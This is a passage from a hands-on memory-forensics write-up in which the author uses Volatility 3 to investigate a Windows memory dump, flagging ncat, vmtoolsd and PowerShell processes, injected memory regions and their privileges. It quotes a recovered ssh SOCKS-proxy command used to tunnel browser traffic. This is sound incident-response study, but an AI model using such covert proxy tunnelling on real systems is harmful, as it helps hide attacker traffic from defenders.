0xe78bf2daa760  TCPv4   127.0.0.1       9999    0.0.0.0 0       LISTENING       4444    ssh.exe 2023-11-16 21:15:54.000000
0xe78bf3af4060  TCPv4   0.0.0.0 443     0.0.0.0 0       LISTENING       10008   httpd.exe       2023-11-16 23:26:16.000000
0xe78bf3af5ea0  TCPv4   0.0.0.0 443     0.0.0.0 0       LISTENING       10008   httpd.exe       2023-11-16 23:26:16.000000
0xe78bf3af5ea0  TCPv6   ::      443     ::      0       LISTENING       10008   httpd.exe       2023-11-16 23:26:16.000000

At first glance, 4444 above in the netscan ouput had me thinking this was a port. However, from the memory dump, it seems this is the PID associated with ssh.exe. Why did I mention that point?! It is important that we do not introduce our biases to our analysis/investigation. It is even more important that we recognize those biases early. At the same time, if we look at the netstat output focusing on the ESTABLISHED sessions, we see there is a port 4444. This is typically associated with Metasploit. Hence this may be a real problem for us.

Moving on.

Actually, I am very disappointed, that I did not have the PIDs, Owner, etc., for the processes that were in ESTABLISHED state via netstat. This just made this self-paced learning a bit more interesting for me.

Going back to the process tree

Q: From the process information previously reviewed, how many "suspicious" processes do you see? Why do you consider these processes as suspicious?

A: There is ncat.exe with PID 896 which spawned connhost.exe with PID 6148 and cmd.exe with PID 8724
Ncat is known as the Swiss Army Knife and can be used for many things. It does not come installed by default on Windows.
This means, so far we have 3 suspicious processes (at least for me).
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+896\s+'
*** 896 1652    ncat.exe        0xe78bf61d5080  1       -       1       True    2023-11-16 22:49:12.000000      N/A
**** 6148       896     conhost.exe     0xe78bf5319080  5       -       1       False   2023-11-16 22:49:12.000000      N/A
**** 8724       896     cmd.exe 0xe78bf531c080  1       -       1       True    2023-11-16 22:49:13.000000      N/A

Q: What are the name(s) and Process ID(s) of these processes?
A: I am also concerned about process vmtoolsd.exe with PID 7164, spawning the following processes:
 ** cmd.exe  > PID:5176
 ** cmd.exe  > PID:5176
 ** cmd.exe > PID: 7072
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+7164\s+|\s+7072\s+'
*** 7164        1100    vmtoolsd.exe    0xe78bf431e080  12      -       1       False   2023-11-16 19:25:21.000000      N/A
**** 5176       7164    cmd.exe 0xe78bf52e9080  0       -       1       False   2023-11-16 22:03:58.000000      2023-11-16 22:06:04.000000
**** 4940       7164    cmd.exe 0xe78bf05391c0  1       -       1       False   2023-11-16 22:12:51.000000      N/A
**** 7072       7164    cmd.exe 0xe78bf59e01c0  1       -       1       False   2023-11-16 23:01:17.000000      N/A
***** 1364      7072    conhost.exe     0xe78c05e54080  3       -       1       False   2023-11-16 23:01:17.000000      N/A

We now have another 5 processes for a total of 8 that seems to be of immediate concern to me (your perspective my differ).

I am going to close off with this final group. I see Windows Terminal is the parent or grandparent of these processes. So at first glance, while I would not consider them suspicious, I still consider them as items to be reviewed. Trust but verify!
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+2460\s+|\s+4728\s+'
*** 2460        1100    WindowsTermina  0xe78bf4f240c0  16      -       1       False   2023-11-16 20:04:59.000000      N/A
**** 644        2460    powershell.exe  0xe78bf5287080  9       -       1       False   2023-11-16 21:16:12.000000      N/A
**** 2692       2460    OpenConsole.ex  0xe78bf65680c0  5       -       1       False   2023-11-16 21:42:53.000000      N/A
**** 5736       2460    OpenConsole.ex  0xe78bf3b880c0  5       -       1       False   2023-11-16 20:05:01.000000      N/A
**** 2352       2460    OpenConsole.ex  0xe78bf46eb0c0  5       -       1       False   2023-11-16 21:16:12.000000      N/A
**** 1684       2460    OpenConsole.ex  0xe78bf63380c0  5       -       1       False   2023-11-16 21:42:18.000000      N/A
**** 4852       2460    powershell.exe  0xe78bf46770c0  9       -       1       False   2023-11-16 21:42:18.000000      N/A
**** 3032       2460    cmd.exe 0xe78bf4e2a080  1       -       1       False   2023-11-16 21:42:53.000000      N/A
**** 4728       2460    powershell.exe  0xe78bf4f900c0  10      -       1       False   2023-11-16 20:05:01.000000      N/A
***** 6152      4728    cmd.exe 0xe78bf5caf0c0  1       -       1       False   2023-11-16 20:16:37.000000      N/A

We now have a total of 18 process that I will consider as suspicious.

Q: Why do you think these processes are suspicious?
A: Now for everyone suspicion may vary. However, for this scenario these represent my starting point. I choose these primarily because of the fact that I see powershell.exe and cmd.exe along with in some cases, I'm concerned about the parent spawning these shells. For example, why is vmtoolsd.exe spawning cmd.exe. That is s a big concern. Maybe it is normal, maybe it is not. However, our job is to find out.

With the suspicious processes Identified, Let's write all those to a file so we can keep them separated from everything else and make our analysis easier and somewhat cleaner.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '896'
*** 896 1652    ncat.exe        0xe78bf61d5080  1       -       1       True    2023-11-16 22:49:12.000000      N/A
**** 6148       896     conhost.exe     0xe78bf5319080  5       -       1       False   2023-11-16 22:49:12.000000      N/A
**** 8724       896     cmd.exe 0xe78bf531c080  1       -       1       True    2023-11-16 22:49:13.000000      N/A
** 5896 696     SgrmBroker.exe  0xe78bf3c9a080  7       -       0       False   2023-11-16 19:11:51.000000      N/A

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '896' >> suspicious_processes.txt

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+7164\s+|\s+7072\s+' >> suspicious_processes.txt

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+2460\s+|\s+4728\s+' >> suspicious_processes.txt

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ls suspicious_processes.txt
suspicious_processes.txt


With a list of suspicious processes, now we can look forward;
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat suspicious_processes.txt
*** 896 1652    ncat.exe        0xe78bf61d5080  1       -       1       True    2023-11-16 22:49:12.000000      N/A
**** 6148       896     conhost.exe     0xe78bf5319080  5       -       1       False   2023-11-16 22:49:12.000000      N/A
**** 8724       896     cmd.exe 0xe78bf531c080  1       -       1       True    2023-11-16 22:49:13.000000      N/A
** 5896 696     SgrmBroker.exe  0xe78bf3c9a080  7       -       0       False   2023-11-16 19:11:51.000000      N/A
*** 7164        1100    vmtoolsd.exe    0xe78bf431e080  12      -       1       False   2023-11-16 19:25:21.000000      N/A
**** 5176       7164    cmd.exe 0xe78bf52e9080  0       -       1       False   2023-11-16 22:03:58.000000      2023-11-16 22:06:04.000000
**** 4940       7164    cmd.exe 0xe78bf05391c0  1       -       1       False   2023-11-16 22:12:51.000000      N/A
**** 7072       7164    cmd.exe 0xe78bf59e01c0  1       -       1       False   2023-11-16 23:01:17.000000      N/A
***** 1364      7072    conhost.exe     0xe78c05e54080  3       -       1       False   2023-11-16 23:01:17.000000      N/A
*** 2460        1100    WindowsTermina  0xe78bf4f240c0  16      -       1       False   2023-11-16 20:04:59.000000      N/A
**** 644        2460    powershell.exe  0xe78bf5287080  9       -       1       False   2023-11-16 21:16:12.000000      N/A
**** 2692       2460    OpenConsole.ex  0xe78bf65680c0  5       -       1       False   2023-11-16 21:42:53.000000      N/A
**** 5736       2460    OpenConsole.ex  0xe78bf3b880c0  5       -       1       False   2023-11-16 20:05:01.000000      N/A
**** 2352       2460    OpenConsole.ex  0xe78bf46eb0c0  5       -       1       False   2023-11-16 21:16:12.000000      N/A
**** 1684       2460    OpenConsole.ex  0xe78bf63380c0  5       -       1       False   2023-11-16 21:42:18.000000      N/A
**** 4852       2460    powershell.exe  0xe78bf46770c0  9       -       1       False   2023-11-16 21:42:18.000000      N/A
**** 3032       2460    cmd.exe 0xe78bf4e2a080  1       -       1       False   2023-11-16 21:42:53.000000      N/A
**** 4728       2460    powershell.exe  0xe78bf4f900c0  10      -       1       False   2023-11-16 20:05:01.000000      N/A
***** 6152      4728    cmd.exe 0xe78bf5caf0c0  1       -       1       False   2023-11-16 20:16:37.000000      N/A


With each of the suspicious processes identified. We can go through the same process for all.
1. Get the command line
2. Get the DLLs the process was using
3. Perform a file scan
4. Attempt to dump files
5. Get the environment variables
6. Get the SIDs
7. Get the Handles
8 . Attempt to find malware in the process
9. Look at the privileges the process was running with
10. Look at the windows registry

We more than likely will not follow this pattern, but it is something you may want to do. In incident response, you pivot based on the evidence you have or encounter. 

Let start with the process command lines.

Extracting all the command lines and writing them to a file:

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.cmdline.CmdLine > cmdline.txt
Progress:  100.00               PDB scanning finished

Q: Looking at the processes you considered as suspicious, did you find anything interesting in the command line?

A: I did not find anything that immediately stood out. I however, added PID 4444 and 4668 to this list as we can see SSH being used to setup a "dynamic" proxy on port 9999, using username kali to connect to the host on 10.0.0.110. Remember, 10.0.0.110 is an IP address we saw above. Also, notice - "-N"? This is will not return a SSH terminal. Meaning there is no intention to authenticate and interact with this host via a terminal.

At the same time, it is not Everday, we see chrome.exe being run from the command line. This command line also ties into the ssh session at PID 4444. Looks like chrome.exe traffic is being proxied through the device at 10.0.0.110 on port 9999.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ grep --perl-regexp '896|8724|7164|5176|4940|7072|2460|644|4852|3032|4728|6152|4444|4668' cmdline.txt
5896    SgrmBroker.exe  C:\Windows\system32\Sgrm\SgrmBroker.exe
7164    vmtoolsd.exe    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
2460    WindowsTermina  "C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.12.10983.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe"
4728    powershell.exe  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6152    cmd.exe Required memory at 0xb247af2020 is inaccessible (swapped)
4444    ssh.exe ssh  -D 9999 kali@10.0.0.110 -N -vvv
644     powershell.exe  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
4668    chrome.exe      chrome.exe  --proxy-server="socks5://127.0.0.1:9999"
4852    powershell.exe  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3032    cmd.exe C:\Windows\System32\cmd.exe
5176    cmd.exe Required memory at 0x62a2d2020 is not valid (process exited?)
4940    cmd.exe C:\Windows\system32\cmd.exe
896     ncat.exe        Required memory at 0x846628 is inaccessible (swapped)
8724    cmd.exe Required memory at 0x2f23020 is inaccessible (swapped)
7072    cmd.exe C:\Windows\system32\cmd.exe

Having not found anything interesting in the command line of those "suspicious" processes, we might have wanted to give up. However, we did find signs of possible proxying going on. 

Outside of the proxying, I am lacking enough evidence to strengthen my suspicion. Truly disappointed but this is how things go. I was really hoping to find the smoking gun(s) in the command line but that was not to be. Still sticking with my suspicious processes.

Since there was not enough meaningful information found from the command line, let's see if the malfind plugin finds anything from the processes we considered suspicious.

Malfind helps us to find malware that has been injected to or is hidden in user mode memory. malfind, helps us to detect malware that standard tools do not see. We can look at the page permissions and VAD tags for example.

There are a couple of approaches here, we can test each PID one at a time such as:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind.Malfind --pid 896

Or we can add multiple:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind.Malfind --pid 896 6148


Let's take the last route so we can run all the PIDs through at one time. Let's start off by getting them all on one line, separated by a space:

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat suspicious_processes.txt | awk --field-separator=' ' '{ print $2 }' | tr '\n' ' '
896 6148 8724 5896 7164 5176 4940 7072 1364 2460 644 2692 5736 2352 1684 4852 3032 4728 6152

Using the previously generated list of PIDs, we see the following:

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind.Malfind --pid 896 6148 8724 5896 7164 5176 4940 7072 1364 2460 644 2692 5736 2352 1684 4852 3032 4728 615
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
PID     Process Start VPN       End VPN Tag     Protection      CommitCharge    PrivateMemory   File output     Hexdump Disasm

7164    vmtoolsd.exe    0x1b986d60000   0x1b986d91fff   VadS    PAGE_EXECUTE_READWRITE  50      1       Disabled
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
0x1b986d60000:  add     byte ptr [rax], al
...

7164    vmtoolsd.exe    0x1b987d90000   0x1b987dc1fff   VadS    PAGE_EXECUTE_READWRITE  50      1       Disabled
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
0x1b987d90000:  add     byte ptr [rax], al
...

From above, it seems malicious code has been injected in the vmtoolds.exe process starting at memory address 0x1b986d60000   and ending at 0x1b986d91fff. We see "VadS", meaning there is no memory mapped file occuping this space.


Similarly, we see below the suspicious code in Powershell with PID 4852 at 0x7df4d16b0000

4852    powershell.exe  0x7df4d16b0000  0x7df4d16bffff  VadS    PAGE_EXECUTE_READWRITE  1       1       Disabled
00 00 00 00 00 00 00 00 ........
78 0d 00 00 00 00 00 00 x.......
0c 00 00 00 49 c7 c2 00 ....I...
00 00 00 48 b8 10 e8 16 ...H....
4c f8 7f 00 00 ff e0 49 L......I
c7 c2 01 00 00 00 48 b8 ......H.
10 e8 16 4c f8 7f 00 00 ...L....
ff e0 49 c7 c2 02 00 00 ..I.....
0x7df4d16b0000: add     byte ptr [rax], al
...


This information is helpful. When we initially looked at process tree, the vmtoolsd.exe process at PID 7164, there was a concern as to why this process spawned multiple cmd.exe

With this in place, time for the questions

Q: Which of your suspicious processes seems to have malware injected or hidden code in user mode memory?
A: We seem to be making progress at this point. Our initial analysis showed concern about vmtoolsd.exe with PID 7164 spawning multiple cmd.exe

Similarly, we see powershell.exe with PID 4852, spawned by Windows Terminal as having malware. Initially, I did not have a concern about this but now I do. 

Revisiting these processes. At this point, suspicion can be pointed to both parent and child.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt  | grep --perl-regexp '7164|4852|2460'
*** 7164        1100    vmtoolsd.exe    0xe78bf431e080  12      -       1       False   2023-11-16 19:25:21.000000      N/A
**** 5176       7164    cmd.exe 0xe78bf52e9080  0       -       1       False   2023-11-16 22:03:58.000000      2023-11-16 22:06:04.000000
**** 4940       7164    cmd.exe 0xe78bf05391c0  1       -       1       False   2023-11-16 22:12:51.000000      N/A
**** 7072       7164    cmd.exe 0xe78bf59e01c0  1       -       1       False   2023-11-16 23:01:17.000000      N/A
*** 2460        1100    WindowsTermina  0xe78bf4f240c0  16      -       1       False   2023-11-16 20:04:59.000000      N/A
**** 644        2460    powershell.exe  0xe78bf5287080  9       -       1       False   2023-11-16 21:16:12.000000      N/A
**** 2692       2460    OpenConsole.ex  0xe78bf65680c0  5       -       1       False   2023-11-16 21:42:53.000000      N/A
**** 5736       2460    OpenConsole.ex  0xe78bf3b880c0  5       -       1       False   2023-11-16 20:05:01.000000      N/A
**** 2352       2460    OpenConsole.ex  0xe78bf46eb0c0  5       -       1       False   2023-11-16 21:16:12.000000      N/A
**** 1684       2460    OpenConsole.ex  0xe78bf63380c0  5       -       1       False   2023-11-16 21:42:18.000000      N/A
**** 4852       2460    powershell.exe  0xe78bf46770c0  9       -       1       False   2023-11-16 21:42:18.000000      N/A
**** 3032       2460    cmd.exe 0xe78bf4e2a080  1       -       1       False   2023-11-16 21:42:53.000000      N/A
**** 4728       2460    powershell.exe  0xe78bf4f900c0  10      -       1       False   2023-11-16 20:05:01.000000      N/A

For now, let's stay focused on the vmtoolsd.exe with PID 7164 and the PowerShell with PID 4852. We can't investigate everything, so let's prioritize and focus on these two for now.

With suspicious code found, let's dump these out.

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind --pid 7164 4852 --dump

Verifying the created files
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ls pid.* -l
-rw------- 1 kali kali  65536 Nov 24 10:45 pid.4852.vad.0x7df4d16b0000-0x7df4d16bffff.dmp
-rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b986d60000-0x1b986d91fff.dmp
-rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b987d90000-0x1b987dc1fff.dmp


Interesting, passing these files through ClamAV did not produce any signs of maliciousness.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ clamscan pid.*
Loading:    17s, ETA:   0s [========================>]    8.68M/8.68M sigs
Compiling:   4s, ETA:   0s [========================>]       41/41 tasks

/home/kali/CHALLENGES/TOTAL_RECALL_2024/pid.4852.vad.0x7df4d16b0000-0x7df4d16bffff.dmp: OK
/home/kali/CHALLENGES/TOTAL_RECALL_2024/pid.7164.vad.0x1b986d60000-0x1b986d91fff.dmp: OK
/home/kali/CHALLENGES/TOTAL_RECALL_2024/pid.7164.vad.0x1b987d90000-0x1b987dc1fff.dmp: OK

----------- SCAN SUMMARY -----------
Known viruses: 8679505
Engine version: 1.0.1
Scanned directories: 0
Scanned files: 3
Infected files: 0
Data scanned: 0.52 MB
Data read: 0.45 MB (ratio 1.16:1)
Time: 23.106 sec (0 m 23 s)
Start Date: 2023:11:24 11:43:10
End Date:   2023:11:24 11:43:33

Interesting! Nothing marked as suspicious. 
At this point, we should have identified potential malware has been injected in two one or more processes. 

Q: What is the permission on the memory regions?
A: PAGE_EXECUTE_READWRITE permissions

Q: How many memory regions reported as having injected code based on your suspicious PIDs
A: 3

Q: What is the size of the memory regions which contains the memory.
A: 204800 and 65536

There are 3 memory regions all with PAGE_EXECUTE_READWRITE permissions.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ls pid.* -l
-rw------- 1 kali kali  65536 Nov 24 10:45 pid.4852.vad.0x7df4d16b0000-0x7df4d16bffff.dmp
-rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b986d60000-0x1b986d91fff.dmp
-rw------- 1 kali kali 204800 Nov 24 10:45 pid.7164.vad.0x1b987d90000-0x1b987dc1fff.dmp

Since no concerns were raised let's look at this from a different perspective. Let's dump files for these processes.

First create a directory

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$mkdir pid 7164

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ mkdir 4852

Taking a snapshot view of the extracted files:

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir 7164/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles.DumpFiles --pid 7164
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
Cache   FileObject      FileName        Result

ImageSectionObject      0xe78bf4c4b390  mfc140enu.dll   file.0xe78bf4c4b390.0xe78bf4724af0.ImageSectionObject.mfc140enu.dll.img
DataSectionObject       0xe78bf448f8b0  oleaccrc.dll    file.0xe78bf448f8b0.0xe78bf43a04f0.DataSectionObject.oleaccrc.dll.dat
DataSectionObject       0xe78bf352b300  cversions.2.db  file.0xe78bf352b300.0xe78bf32f71f0.DataSectionObject.cversions.2.db.dat
DataSectionObject       0xe78bf352b300  cversions.2.db  file.0xe78bf352b300.0xe78bf32f71f0.DataSectionObject.cversions.2.db.dat
DataSectionObject       0xe78bf5512d10  msxml3r.dll     file.0xe78bf5512d10.0xe78bf4f4d0b0.DataSectionObject.msxml3r.dll.dat
DataSectionObject       0xe78bf2f8d770  crypt32.dll.mui file.0xe78bf2f8d770.0xe78bf2d3c570.DataSectionObject.crypt32.dll.mui.dat
DataSectionObject       0xe78bf3529a00  msxml6r.dll     file.0xe78bf3529a00.0xe78bf3a0d360.DataSectionObject.msxml6r.dll.dat
..............



┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles.DumpFiles --pid 4852 | more
Volatility 3 Framework 2.5.2    PDB scanning finished

Cache   FileObject      FileName        Result

DataSectionObject       0xe78bf37c5b80  winnlsres.dll   file.0xe78bf37c5b80.0xe78bf3a0d720.DataSectionObject.winnlsres.dll.dat
DataSectionObject       0xe78bf37c5ea0  winnlsres.dll.mui       file.0xe78bf37c5ea0.0xe78bf3a0d0e0.DataSectionObject.winnlsres.dll.mui.dat
DataSectionObject       0xe78bf2f8d770  crypt32.dll.mui file.0xe78bf2f8d770.0xe78bf2d3c570.DataSectionObject.crypt32.dll.mui.dat
ImageSectionObject      0xe78bf3fe36a0  System.Numerics.dll     file.0xe78bf3fe36a0.0xe78bf0fd2210.ImageSectionObject.System.Numerics.dll.img
ImageSectionObject      0xe78bf5523b60  Microsoft.PowerShell.PSReadLine.dll     file.0xe78bf5523b60.0xe78bf2ed1d00.ImageSectionObject.Microsoft.PowerShe
ll.PSReadLine.dll.img
...........................


Run all of these files through ClamAV. But first ensure ClamAV is up-to-date.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ sudo freshclam --show-progress
Thu Dec 14 10:13:04 2023 -> ClamAV update process started at Thu Dec 14 10:13:04 2023
Thu Dec 14 10:13:04 2023 -> daily.cld database is up-to-date (version: 27123, sigs: 2048780, f-level: 90, builder: raynman)
Thu Dec 14 10:13:04 2023 -> main.cvd database is up-to-date (version: 62, sigs: 6647427, f-level: 90, builder: sigmgr)
Thu Dec 14 10:13:04 2023 -> bytecode.cvd database is up-to-date (version: 334, sigs: 91, f-level: 90, builder: anvilleg)

Now scan the files again.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ clamscan 7164/* 4852/*
Loading:    18s, ETA:   0s [========================>]    8.68M/8.68M sigs
Compiling:   3s, ETA:   0s [========================>]       41/41 tasks
....
----------- SCAN SUMMARY -----------
Known viruses: 8680656
Engine version: 1.0.3
Scanned directories: 0
Scanned files: 232
Infected files: 0
Data scanned: 263.46 MB
Data read: 297.22 MB (ratio 0.89:1)
Time: 246.675 sec (4 m 6 s)
Start Date: 2023:12:14 10:14:36
End Date:   2023:12:14 10:18:43

Well isn't this depressing!! Nothing being reported as suspicious. While depressing, it is not surprising. If we go back above, we see Microsoft Defender was the EDR producing running at the time of this capture. We could assume if these files were seen as malicious by Defender, it would have acted on them. At this point because of high suspicion, I would still take this device offline as while the security tools have not validated "maliciousness", I have enough evidence to make a decision. This device 10.0.0.108 and the neighboring devices at 10.0.0.101 and 10.0.0.110 should be taken offline. The map previously seen in the network statistics section shows there are established connections with these hosts.

Q: What privileges is the VMWare process at PID 7164 running with?
A: Get the privileges these vmtoolsd.exe with PID 7164 is running with 
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ /volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.privileges.Privs --pid 7164
Volatility 3 Framework 2.5.2
Progress:  100.00               PDB scanning finished
PID     Process Value   Privilege       Attributes      Description

7164    vmtoolsd.exe    2       SeCreateTokenPrivilege          Create a token object
7164    vmtoolsd.exe    3       SeAssignPrimaryTokenPrivilege           Replace a process-level token
7164    vmtoolsd.exe    4       SeLockMemoryPrivilege           Lock pages in memory
7164    vmtoolsd.exe    5       SeIncreaseQuotaPrivilege                Increase quotas
7164    vmtoolsd.exe    6       SeMachineAccountPrivilege               Add workstations to the domain
7164    vmtoolsd.exe    7       SeTcbPrivilege          Act as part of the operating system
7164    vmtoolsd.exe    8       SeSecurityPrivilege             Manage auditing and security log
7164    vmtoolsd.exe    9       SeTakeOwnershipPrivilege                Take ownership of files/objects
7164    vmtoolsd.exe    10      SeLoadDriverPrivilege           Load and unload device drivers
7164    vmtoolsd.exe    11      SeSystemProfilePrivilege                Profile system performance
7164    vmtoolsd.exe    12      SeSystemtimePrivilege           Change the system time
7164    vmtoolsd.exe    13      SeProfileSingleProcessPrivilege         Profile a single process
7164    vmtoolsd.exe    14      SeIncreaseBasePriorityPrivilege         Increase scheduling priority
7164    vmtoolsd.exe    15      SeCreatePagefilePrivilege               Create a pagefile
7164    vmtoolsd.exe    16      SeCreatePermanentPrivilege              Create permanent shared objects
7164    vmtoolsd.exe    17      SeBackupPrivilege               Backup files and directories
7164    vmtoolsd.exe    18      SeRestorePrivilege              Restore files and directories
7164    vmtoolsd.exe    19      SeShutdownPrivilege     Present Shut down the system
7164    vmtoolsd.exe    20      SeDebugPrivilege                Debug programs
7164    vmtoolsd.exe    21      SeAuditPrivilege                Generate security audits
7164    vmtoolsd.exe    22      SeSystemEnvironmentPrivilege            Edit firmware environment values
7164    vmtoolsd.exe    23      SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories
7164    vmtoolsd.exe    24      SeRemoteShutdownPrivilege               Force shutdown from a remote system
7164    vmtoolsd.exe    25      SeUndockPrivilege       Present Remove computer from docking station
7164    vmtoolsd.exe    26      SeSyncAgentPrivilege            Synch directory service data
7164    vmtoolsd.exe    27      SeEnableDelegationPrivilege             Enable user accounts to be trusted for delegation
7164    vmtoolsd.exe    28      SeManageVolumePrivilege         Manage the files on a volume
7164    vmtoolsd.exe    29      SeImpersonatePrivilege          Impersonate a client after authentication
7164    vmtoolsd.exe    30      SeCreateGlobalPrivilege Default Create global objects
7164    vmtoolsd.exe    31      SeTrustedCredManAccessPrivilege         Access Credential Manager as a trusted caller
7164    vmtoolsd.exe    32      SeRelabelPrivilege              Modify the mandatory integrity level of an object
7164    vmtoolsd.exe    33      SeIncreaseWorkingSetPrivilege   Present Allocate more memory for user applications
7164    vmtoolsd.exe    34      SeTimeZonePrivilege     Present Adjust the time zone of the computer's internal clock
7164    vmtoolsd.exe    35      SeCreateSymbolicLinkPrivilege           Required to create a symbolic link
7164    vmtoolsd.exe    36      SeDelegateSessionUserImpersonatePrivilege               Obtain an impersonation token for another user in the same session.


Q: What privileges is the PowerShell process at 4852 running with?
A: Looking at the PowerShell process at 4852 also:

┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.privileges.Privs --pid 4852 | sed '1,4d'
4852	powershell.exe  2       SeCreateTokenPrivilege          Create a token object
4852    powershell.exe  3       SeAssignPrimaryTokenPrivilege           Replace a process-level token
4852    powershell.exe  4       SeLockMemoryPrivilege           Lock pages in memory
4852    powershell.exe  5       SeIncreaseQuotaPrivilege        Present Increase quotas
4852    powershell.exe  6       SeMachineAccountPrivilege               Add workstations to the domain
4852    powershell.exe  7       SeTcbPrivilege          Act as part of the operating system
4852    powershell.exe  8       SeSecurityPrivilege     Present Manage auditing and security log
4852    powershell.exe  9       SeTakeOwnershipPrivilege        Present Take ownership of files/objects
4852    powershell.exe  10      SeLoadDriverPrivilege   Present Load and unload device drivers
4852    powershell.exe  11      SeSystemProfilePrivilege        Present Profile system performance
4852    powershell.exe  12      SeSystemtimePrivilege   Present Change the system time
4852    powershell.exe  13      SeProfileSingleProcessPrivilege Present Profile a single process
4852    powershell.exe  14      SeIncreaseBasePriorityPrivilege Present Increase scheduling priority
4852    powershell.exe  15      SeCreatePagefilePrivilege       Present Create a pagefile
4852    powershell.exe  16      SeCreatePermanentPrivilege              Create permanent shared objects
4852    powershell.exe  17      SeBackupPrivilege       Present Backup files and directories
4852    powershell.exe  18      SeRestorePrivilege      Present Restore files and directories
4852    powershell.exe  19      SeShutdownPrivilege     Present Shut down the system
4852    powershell.exe  20      SeDebugPrivilege        Present,Enabled Debug programs
4852    powershell.exe  21      SeAuditPrivilege                Generate security audits
4852    powershell.exe  22      SeSystemEnvironmentPrivilege    Present Edit firmware environment values
4852    powershell.exe  23      SeChangeNotifyPrivilege Present,Enabled,Default Receive notifications of changes to files or directories
4852    powershell.exe  24      SeRemoteShutdownPrivilege       Present Force shutdown from a remote system
4852    powershell.exe  25      SeUndockPrivilege       Present Remove computer from docking station
4852    powershell.exe  26      SeSyncAgentPrivilege            Synch directory service data
4852    powershell.exe  27      SeEnableDelegationPrivilege             Enable user accounts to be trusted for delegation
4852    powershell.exe  28      SeManageVolumePrivilege Present Manage the files on a volume
4852    powershell.exe  29      SeImpersonatePrivilege  Present,Enabled,Default Impersonate a client after authentication
4852    powershell.exe  30      SeCreateGlobalPrivilege Present,Enabled,Default Create global objects
4852    powershell.exe  31      SeTrustedCredManAccessPrivilege         Access Credential Manager as a trusted caller
